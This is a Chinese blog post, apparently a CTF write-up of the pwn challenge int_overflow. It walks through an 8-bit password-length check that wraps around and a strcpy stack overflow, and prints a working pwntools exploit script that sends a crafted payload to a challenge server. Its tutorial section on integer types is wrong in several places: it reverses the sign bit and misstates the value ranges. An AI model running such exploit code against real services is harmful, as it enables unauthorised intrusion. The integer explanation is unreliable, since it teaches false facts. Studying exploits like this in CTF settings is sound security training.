CTF|pwn栈溢出题目int_overflow解题思路及个人总结

最新推荐文章于 2026-06-19 10:03:20 发布
原创 最新推荐文章于 2026-06-19 10:03:20 发布 · 2.6k 阅读 · 19 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#python
本文详细介绍了CTF比赛中遇到的pwn类型题目int_overflow的解题思路。通过分析代码,发现存在整数溢出的可能性,通过控制8位整数变量v3的值,使其在3-8之间,利用strcpy函数溢出,成功获取flag。个人总结中还讲解了整数溢出原理,并给出了构造payload的方法。
Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

CTF|pwn栈溢出题目int_overflow解题思路及个人总结

解题思路

拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下
在这里插入图片描述
老规矩将题目拖到IDA放入ubuntu中查看相关信息
在这里插入图片描述*
stack/canary保护没开
ubuntu运行一下
在这里插入图片描述
简单的选择登陆 输入账号密码 返回结果
在这里插入图片描述
拖入IDA 反编译 查看main函数
进入login函数
在这里插入图片描述

login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出
我们继续进入check_passwd函数
在这里插入图片描述
这个函数只要是核对密码的过程,得到如下的信息:

  1. 定义的v3大小为8bits,讲s的长度赋给v3
  2. v3 需要在3-8之间
  3. 函数讲s复制给dest里面 dest在栈占0x14的位置
  4. v3作为一个int,可以存在整数溢出的情况(后面总结)然后复制到dest变量的时候占满0x14的空间后发生溢出

编写exp如下:

from pwn import*
p = remote('124.126.19.106',38049)

sys_addr = 0x0804868B

payload = 'a'*0x14 + 'aaaa' + p32(sys_addr) + 'a' *234


p.recvuntil("choice:")
p.sendline("1")
p.recvuntil("username:")
p.sendline("123")
p.recvuntil("passwd:")
p.sendline(payload)

p.interactive()

个人总结

首先将exp各部分解释一下

导入pwn模块 设定题目场景
sys_addr从IDA中可以看到
在这里插入图片描述
即调用到了这个函数 我们就可以得到flag

后半部分的recvuntil() 和 sendline()就根据整个文件的流程走

主要是payload的书写

前面提到int型变量v3可能存在整数溢出的情况我们先来看看各种整数的类型的大小

整数分为有符号无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为 1,负数为 0,无符号数取值范围为非负数,常见各类型占用字节数如下:

类型占用字节及取值范围
int4 -2147483648~2147483648
short int-32768~32768
long int-2147483648~2147483648
unsigned int0~4294967295
unsigned short int0~65537
unsigned long int0~4294967295

可以看到不同类型的整型变量是有不同的取值范围的,我们输入的值如果在合理范围的话就没事,但是如果输入的值超过了取值范围的话,会发生溢出
针对溢出:计算机会默认取输入值得后面部分 例如对于8bit的int型取值是在-255~255,如果输入256的话,255对应二进制是1111 1111 而256对应二进制1 0000 0000 计算机遇到256时就会默认去后面的部分即0000 0000 所以256会被认作是0 同理257是1 ,258是2… …

有了这样的原理对于v3我们可以输入259~264中的其中一个数,符合8>v3>3的要求,从而构造payload

而payload中间填充四个a是因为在这里插入图片描述
strcpy函数调用过程将s与dest压入栈 ,但是最后还执行了leave操作,最多覆盖4字节 所以payload中要填充4个a

234 = 262(这里取262) - 0x14 -4 -4
执行

python int_overflow.py

得到flag
在这里插入图片描述

博客内容仅是个人学习对知识的理解,如有不对的地方欢迎指正

期待与你的共同进步:)

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

BugkuCTFoverflow2[WriteUP]
如有错误感谢斧正
04-14 1281
我们需要构造payload使buf数组溢出,然后接上这里的total总的合成地址即可实现shell交互。总共需要填充28个字节,后面溢出可以填充为成0x20+0x8,或者直接写成0x28。总链:total = 0x40126b + 0x402004 + 0x401050。存在/bin/sh意味着我们可以利用这个字符串启动shell,双击查看地址。先看到_system函数,此函数可以直接返回一个由实参当作命令的消息。再查看下方的地址信息,获取到该函数十六进制地址为:0x401050。查看一下flag文件。
PWN做题笔记2-int_overflow(已校对)
qq_40923256的博客
04-19 402
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1 如图,程序是一个32位ELF文件 chesec ida反编译,main方法中实现了登录功能,无溢出点 login方法中输入用户名和密码: 这里位数上0x19<40,0x199<512,因此无溢出 check_passwd实现对密码长度进行检查: 密...
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至
07-29 2921
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
栈溢出知识讲解
2401_89161017的博客
05-05 842
栈溢出是一种内存漏洞,当程序向栈中写入的数据超过栈帧分配的空间时,多余的数据会覆盖栈上其他重要数据(如返回地址、局部变量等),从而可能劫持程序控制流。
攻防世界 int_overflow 超超超详细
PushSafe
10-23 3441
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
2018巅峰极客writeup(Misc)
Mistsatan
07-30 4579
2018巅峰极客writeup(Misc) 作为一个渣渣,带着去看各路神仙打架的想法报名了这次的“巅峰极客”CTF比赛,7.21第一场线上赛果然从头水到尾。。。 为了方便之后巩固,把近几天学习大佬们的writeup过程中总结整理的内容记录下来,第一次写成博客。
从零理解Pwn与二进制漏洞利用:栈溢出实战入门
CURSED!
06-17 1544
缓冲区溢出是计算机安全领域的基础性漏洞,其原理在于程序向预定内存区域写入数据时超出了边界,导致相邻的关键数据被覆盖。从技术实现看,这源于C/C++等语言中缺乏边界检查的函数(如gets、strcpy)与程序内存布局的交互缺陷。理解栈、堆、寄存器(如EIP/RIP)和函数调用约定是分析此类漏洞的前提。掌握漏洞利用技术,不仅能深入理解系统底层运行机制,更是构建有效防御体系、进行安全审计和CTF竞赛的核心能力。本文以栈溢出为例,通过环境搭建、动态调试和Exploit编写,系统演示了从漏洞触发到获取Shell的完整
CTF PWN入门:从栈溢出到ROP链的漏洞利用实战指南
weixin_34184561的博客
06-18 399
在计算机安全领域,内存破坏漏洞是攻击者获取系统控制权的常见入口。这类漏洞的原理在于程序对用户输入缺乏边界检查,导致数据覆盖关键内存区域,从而可能劫持程序执行流程。从技术价值看,理解内存管理机制和CPU执行原理,不仅能帮助安全人员发现和修复漏洞,也是构建安全软件的基础。在CTF竞赛和渗透测试中,栈溢出、堆漏洞和格式化字符串漏洞是PWN方向的核心考点。通过GDB、checksec、ROPgadget等工具链,分析者可以动态调试程序、检查安全机制并构造利用链。本文以栈溢出为例,详细展示了从信息收集、偏移计算到构造
CTF二进制漏洞实战:栈溢出与格式化字符串攻防解析
weixin_33701564的博客
06-19 400
二进制漏洞是计算机安全领域的核心概念,指程序在底层运行时因逻辑缺陷导致的安全问题。其原理源于内存管理机制,如函数调用时栈帧的布局不当,可能被恶意数据覆盖关键控制信息。这类漏洞的技术价值在于揭示了软件安全的根本挑战,即信任边界与输入验证的缺失。在应用场景上,CTF竞赛提供了合法且系统的演练环境,参赛者通过分析、利用漏洞完成夺旗任务。本文聚焦栈溢出和格式化字符串两种经典漏洞,结合pwntools等工具链,详解从信息泄露到ROP链构建的完整利用过程,帮助读者掌握二进制安全的实战技能。
CTF PWN堆利用实战:从UAF到House of Cat的完整利用链构建
最新发布
weixin_28622215的博客
06-19 299
堆漏洞利用是二进制安全领域的核心挑战,其原理基于对动态内存管理机制(如glibc的ptmalloc)的深刻理解。通过利用释放后使用(UAF)等经典漏洞,攻击者可以控制已释放的内存块,进而实现内存布局的操控,最终获得任意地址读写或代码执行能力,这在CTF竞赛和高级渗透测试中具有极高的技术价值。随着glibc版本更新,传统的劫持技术(如覆盖__free_hook)失效,以House of Cat为代表的新型利用技术应运而生,它通过伪造IO_FILE结构体并劫持虚函数表,在glibc 2.34+环境中实现了强大的
int型溢出问题
热门推荐
小熊的博客
04-17 1万+
计算的值超过了int上限后却变成了负数。
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 685
[攻防世界]int_overflow巨细
int_overflow
weixin_45846085的博客
05-24 574
1.程序检查 下载附件,checksec一下检查文件保护 只打开了NX保护,栈不可以执行 运行一下程序选择,整个程序功能就是输入一个名字和密码 查看一下程序当中引用的字符串,我们发现了一个cat flag 2.流程分析 使用神器IDA ,查看程序整体逻辑。 在what_is_this函数中发现cat flag,我们的目标就是控制程序去执行,what_is_this这个函数。 这里程序的漏洞很明显strcpy是可以栈溢出的地方 这边我们就可以进行栈溢出。 但是这个程序有一个密码长度检查,那么
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 1174
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
int_overflow--writeup
ATFWUS的博客
03-02 924
文件下载地址: 链接:https://pan.baidu.com/s/1RiL_dBXGdIRsz76Nw0Mj2w 提取码:s8sy 目录 0x01.分析 checksec: 看下源码: 理清一下流程: 寻找一下漏洞: 利用漏洞攻击: 0x02.exp 0x01.分析 checksec: 32位程序,开启了NX。 看下源码: 理清一下流程:...
int_overflow(xctf)
weixin_43868725的博客
05-06 689
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2946
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 2876
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出,溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
CTF竞赛题目解析:PWN之“Easy_Stack_Overflow“入门教程
2501_92452343的博客
06-15 860
今天我要分享一道非常适合PWN入门者的CTF题目——"Easy_Stack_Overflow"。返回地址可以指向shellcode所在的栈地址(如0xffffd100)- `name_buffer`只有64字节,但输入可以无限长。- 返回到系统函数(如system("/bin/sh"))- 使用危险的`gets()`函数,没有限制输入长度。- 使用安全的输入函数(如fgets)- libc.so.6(提供的libc库)- readme(提示:试试输入长字符串)- 使用不安全的`gets()`函数。
int_overflow的WP(整数溢出)
WangLal的博客
02-14 393
攻防世界PWN int_overflow的WP 基本三步 checksec,file,执行文件 可以看出是个32位文件,且开了NX和RELRO。 之后扔到32位IDA pro 中查看 main函数看不到flag和溢出点,就每一个函数都看一下, 在下面这个函数看到了flag, 点击 what_is_this函数,得到函数地址0X804868B 在函数check—passwd,看起来好像有个溢出点,但不知道是什么溢出 看了一下其他大佬的WP,发现是整数溢出,有兴趣的,可以去这个博客看一下(https://
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值